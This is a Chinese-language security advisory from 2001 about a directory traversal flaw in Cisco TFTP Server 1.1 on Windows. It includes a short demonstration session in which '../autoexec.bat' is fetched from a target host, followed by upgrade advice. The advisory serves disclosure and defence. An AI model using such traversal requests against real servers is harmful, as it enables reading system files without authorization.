发布日期：2001-06-18
更新日期：2001-06-25

受影响系统：

Cisco TFTP Server 1.1
   - Microsoft Windows 98se
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

描述：

---

BUGTRAQ  ID: 2886
CVE(CAN) ID: CAN-2001-0783

Cisco TFTP server是Cisco开发的一个tftp服务器。主要用来在微软Windows系统下提供
TFTP(简单文件传输协议)服务。

它的1.1版本存在一个目录遍历漏洞。攻击者可以通过tftp服务器访问系统上的任意文件
。只要在文件名前面加上一些"../"，就可能下载目标主机上的任意文件。

<*来源： Siberian (siberian@splashpages.de)  *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Siberian (siberian@splashpages.de)提供了下列测试代码：

tftp> connect target
tftp> get ../autoexec.bat
Recieved 218 bytes in 0.4 seconds
tftpd> quit



建议：

---

临时解决方法：

如果您正在使用有问题的版本，我们建议您立刻停止使用此版本或者升级到最新版本。

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp


浏览次数：5311
严重程度：0（网友投票）